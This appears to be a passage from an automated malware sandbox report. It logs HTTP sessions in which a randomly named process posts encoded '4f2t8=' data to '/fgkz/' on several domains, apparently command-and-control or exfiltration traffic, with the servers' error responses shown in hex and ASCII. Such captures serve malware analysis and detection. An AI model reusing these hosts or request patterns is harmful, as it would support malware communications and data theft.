                                Data Ascii: 4f2t8=Xc2pHUoEkm+ObmYDm0d+SPVfHTrNljjV9Qu1NSBg0EdnSONV0GUpdGHFxySQoyk5Y0f9f37Cnr+V+XPA3XwAJmDSwObGo/Nr1cosWK6Dq1PZUjllroksYEL8ZNfsBd8ZTKaki95paGD8yAq0SO5psy4YPnN7qYFZE2CwRI/fu/11PDWUfCPU+hF2Ns3fOvbKwldttuSLZHIrBcher41A5n1q14vOsGIc+OOaBIK7lRmgBVdVe0WHN7NHpxWBZm/Az7pCtalrP+AStvQU8RMIeLEF2uqVfoE2CRmElePBVj31iFCgN1cGsjkllxYLXx1etGCHwWJHQJsYE+kCa3nVx8v/214Eo48Wi+ygIAB82UOe2oWXJlqgLJ8tCiUgrj09ojdXZ3MyCJwebipWM8vKO2JvAwiI1XWWu/4KNSjAidIL0wivQJ+dTg8Ekjo9DS3X0ylNgMDwwqEaPLQrz90JDTAqAqf8n4KyYejn9scAH67f78IE6cJcXaSlbGHMDlDot1HLjDgtkEN1GOKLBi/gv1B1bp53ylmzdUG3Xbb46KW9LjtY+vmH36/dHuJaeeSqbIJdNqoX1xi14obCLylQGEm5tx+EKBSjR6hp8xlAf9kcBWhEt+twkYljdmpJbincqxXNNSykfP2KtTN4a6nsr6sJTM0120N0et6wPc9KRPDR8+jvd2NMGO20qF4OZpspcsWERKa/b1CoxVavTy66hwZB0ylJQ5Jg267442XSXB2JaBMeAxupNvTKckI2NNynDnozCs+kcXx3QC4tabWc17VO5OrwSHVH7dOznB1jocfqYm2yJAWkQGOdh0JkAypI3F214KniZoVSvirZfZ3v5HGm+7wLEHgT6Cgk+wlCSJfPyK4b4CM2x/jb/POaz6/+C8EGsV634Bo4t9du4oZ/SAGEm0/2s5eg4jPbxlgTV9A+GBlfT9BOUBA23velfO5AfLaKRFci8IcbFlB6kgwFQtCuZJ8vf4dQLtAIYVSJn0njgN [TRUNCATED]
                                Aug 30, 2024 07:20:49.127135038 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:48 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.549746122.10.12.59805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:50.781810999 CEST344OUTGET /fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:20:51.661463976 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:51 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.54974791.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:05.411534071 CEST639OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 31 33 71 4f 6f 71 57 67 33 52 30 4e 46 46 31 55 4d 79 61 33 4c 6c 36 31 74 33 73 54 41 49 4a 36 43 32 48 4d 69 79 51 6e 56 7a 7a 54 66 49 46 43 49 51 4c 44 73 72 53 78 2f 64 74 4a 41 42 62 77 4c 2f 4a 37 64 56 43 2f 77 77 38 33 38 32 68 69 6c 76 44 74 55 74 32 6e 70 6a 78 4c 30 6e 67 57 6d 55 69 30 63 50 73 39 37 37 56 2f 66 39 49 55 52 6e 66 4d 4d 43 4c 30 6a 73 79 51 42 76 6f 6c 73 6a 6c 51 36 50 32 67 66 72 68 55 42 74 47 2f 6f 38 75 79 31 56 6a 31 45 2f 35 61 6d 55 53 67 41 62 56 72 57 44 63 77 63 7a 69 31 69 71 42 79 2b 67 3d 3d
                                Data Ascii: 4f2t8=13qOoqWg3R0NFF1UMya3Ll61t3sTAIJ6C2HMiyQnVzzTfIFCIQLDsrSx/dtJABbwL/J7dVC/ww8382hilvDtUt2npjxL0ngWmUi0cPs977V/f9IURnfMMCL0jsyQBvolsjlQ6P2gfrhUBtG/o8uy1Vj1E/5amUSgAbVrWDcwczi1iqBy+g==
                                Aug 30, 2024 07:21:06.071223021 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.54974891.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:07.944053888 CEST659OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 31 33 71 4f 6f 71 57 67 33 52 30 4e 66 6b 6c 55 63 6c 4f 33 4d 46 36 36 6e 58 73 54 4b 6f 49 7a 43 32 37 4d 69 7a 6b 33 56 6c 4c 54 59 70 31 43 4a 52 4c 44 72 72 53 78 30 39 74 4d 4e 68 62 72 4c 2f 4d 4f 64 58 57 2f 77 77 34 33 38 30 4a 69 6c 59 76 73 55 39 32 68 6a 7a 78 4a 77 6e 67 57 6d 55 69 30 63 50 52 57 37 37 64 2f 63 4a 30 55 52 44 4c 50 53 79 4c 31 31 38 79 51 46 76 6f 68 73 6a 6c 2b 36 4b 76 4c 66 75 39 55 42 6f 43 2f 6f 49 43 78 38 56 6a 73 4b 66 34 75 72 58 4c 38 47 37 4e 35 65 79 46 4f 4a 44 48 47 71 66 74 68 35 53 2b 56 6a 52 59 48 46 6b 53 78 7a 39 4f 45 36 30 35 53 4c 66 4d 3d
                                Data Ascii: 4f2t8=13qOoqWg3R0NfklUclO3MF66nXsTKoIzC27Mizk3VlLTYp1CJRLDrrSx09tMNhbrL/MOdXW/ww4380JilYvsU92hjzxJwngWmUi0cPRW77d/cJ0URDLPSyL118yQFvohsjl+6KvLfu9UBoC/oICx8VjsKf4urXL8G7N5eyFOJDHGqfth5S+VjRYHFkSxz9OE605SLfM=
                                Aug 30, 2024 07:21:08.582278013 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.54974991.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:10.484987974 CEST1672OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 31 33 71 4f 6f 71 57 67 33 52 30 4e 66 6b 6c 55 63 6c 4f 33 4d 46 36 36 6e 58 73 54 4b 6f 49 7a 43 32 37 4d 69 7a 6b 33 56 6d 72 54 59 66 68 43 49 79 6a 44 71 72 53 78 39 64 74 4e 4e 68 61 72 4c 2f 30 4b 64 58 62 4b 77 79 77 33 36 58 78 69 79 63 37 73 66 39 32 68 72 54 78 49 30 6e 68 65 6d 51 47 77 63 50 68 57 37 37 64 2f 63 49 6b 55 46 48 66 50 51 79 4c 30 6a 73 79 4d 42 76 6f 46 73 6a 39 49 36 4f 79 77 66 64 6c 55 41 49 53 2f 37 4e 75 78 2b 31 6a 75 61 50 34 32 72 58 33 56 47 37 52 31 65 7a 78 77 4a 42 48 47 75 4c 6f 5a 39 51 32 4d 31 79 45 68 4b 68 32 44 79 5a 47 4e 6e 6c 67 54 52 4b 55 4d 73 6f 50 59 63 68 48 44 76 71 4a 38 30 62 31 4e 2b 53 75 54 6a 51 4c 5a 4d 36 4a 68 39 71 76 34 4c 39 78 61 4a 6f 4d 76 43 61 68 39 76 56 55 45 36 45 39 2b 37 4b 61 37 78 75 52 39 4a 73 68 57 46 58 4f 74 47 4c 61 7a 4f 47 58 65 6a 4f 62 43 59 52 39 2b 39 4f 38 54 56 37 4d 33 69 37 78 2b 30 32 55 6c 61 52 55 58 4b 74 48 6d 47 4f 58 50 6a 30 43 6e 58 77 6d 4c 41 32 36 47 73 6d 4b 30 66 36 47 67 [TRUNCATED]
                                Data Ascii: 4f2t8=13qOoqWg3R0NfklUclO3MF66nXsTKoIzC27Mizk3VmrTYfhCIyjDqrSx9dtNNharL/0KdXbKwyw36Xxiyc7sf92hrTxI0nhemQGwcPhW77d/cIkUFHfPQyL0jsyMBvoFsj9I6OywfdlUAIS/7Nux+1juaP42rX3VG7R1ezxwJBHGuLoZ9Q2M1yEhKh2DyZGNnlgTRKUMsoPYchHDvqJ80b1N+SuTjQLZM6Jh9qv4L9xaJoMvCah9vVUE6E9+7Ka7xuR9JshWFXOtGLazOGXejObCYR9+9O8TV7M3i7x+02UlaRUXKtHmGOXPj0CnXwmLA26GsmK0f6GgOMsYuIyIaZTR0jwXqiyxYlLNfOSTn1p1spTEuXFxVROZCDaVTz5FEmGAwcClDOAf5HUHVr+S/ADNIwmHKgNJzoPAyD5GKq5F6w4VDKUVzvIqeFhtMsnVCiEYz98Bh3yUvEFElRPXHy9FD2xzXkZZryq2b8ygGv04h6mIqskPxN6In95T+pPW7hn/Rsc4Ljvpo2yY4dAIGVM+4cXuZog7jUgA/A1BHhnsg8jiWmuUpDjwzPawhgtMkC1+sJLEWakHMbURnd9OvaL/JhQQwjm4V5rodlX3G/QcuaQx7Ed0MPIuViB6TkdZ8x+ONBC5sT4t+E0CeeMLk2IkX6cXqytoDFI6K6z24LlJzrYlVoPEG+aZmmzFuUzt9aHYKNpPomZedLeICgHVdyzCh41QIDpWFrI39mEsvWJJpQwAFQDMc9U2CxIEmy1JNxTLREDxNaY0SCYN5nd1TRYiW4Oz64maxYPYhkSajlx5ZE4iNz5W9hXFydIcGDoMSKYPQGG4VhNSpJB3LlTVdAUpDnXrfs4ssL2R6PolvS5oi0exSjY1twbfDhFq3CoxufCiVJ2oEzqd8mbCl9U+P+4HX96bKhp0ze/wqRWkyZYpAl0cBQityTRLsXLRLrKIdYf/ww9sdItQ+CB274sVy21oFdPnmQEKkbmrKQzCmjV10q [TRUNCATED]
                                Aug 30, 2024 07:21:11.139312983 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.54975091.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:13.015535116 CEST353OUTGET /fgkz/?4f2t8=41Curen82hkwcHpyAWCbG1C0h00zKpR4XE7lig5tQUDuQ/w4IAvXl9Gm09xCLibXJ4gYU1q3vSZc7UEZudfqXPaUnSpi+WZhrQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:13.661000967 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.549751216.40.34.41805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:27.623287916 CEST621OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2b 70 47 67 46 75 53 56 2b 69 42 72 71 47 46 49 64 6b 73 4d 4e 57 37 49 51 35 78 48 4c 4d 52 4e 62 6f 65 70 35 50 51 37 62 47 55 4a 54 2b 33 32 7a 4b 48 4d 6e 79 44 71 51 48 2b 56 63 36 2f 6f 52 52 6e 6b 46 4b 47 73 61 42 68 75 57 77 59 70 35 47 39 42 4d 5a 4e 50 53 70 77 65 4b 2b 58 47 35 57 75 4f 57 53 6e 45 2b 41 31 46 67 66 2f 32 44 6c 71 50 78 43 2b 2f 2f 61 6a 70 56 6e 63 48 32 6b 6a 54 57 59 54 74 30 55 50 44 61 59 66 6a 59 79 49 48 64 35 64 51 48 32 6d 4e 4d 57 4e 46 4b 36 6b 55 4c 6c 58 4c 6f 61 6d 4f 53 52 7a 48 55 67 3d 3d
                                Data Ascii: 4f2t8=+pGgFuSV+iBrqGFIdksMNW7IQ5xHLMRNboep5PQ7bGUJT+32zKHMnyDqQH+Vc6/oRRnkFKGsaBhuWwYp5G9BMZNPSpweK+XG5WuOWSnE+A1Fgf/2DlqPxC+//ajpVncH2kjTWYTt0UPDaYfjYyIHd5dQH2mNMWNFK6kULlXLoamOSRzHUg==
                                Aug 30, 2024 07:21:28.140078068 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 78244037-ccc2-4297-85d4-ff9e3a2f927c
                                x-runtime: 0.036430
                                content-length: 16984
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:28.140094995 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:28.140105963 CEST448INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:28.140111923 CEST1236INData Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                Aug 30, 2024 07:21:28.140124083 CEST1236INData Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                Aug 30, 2024 07:21:28.140132904 CEST448INData Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69
                                Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                Aug 30, 2024 07:21:28.140139103 CEST1236INData Raw: 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72
                                Data Ascii: 2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-
                                Aug 30, 2024 07:21:28.140142918 CEST1236INData Raw: 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c
                                Data Ascii: (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/acti
                                Aug 30, 2024 07:21:28.140153885 CEST1236INData Raw: 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63
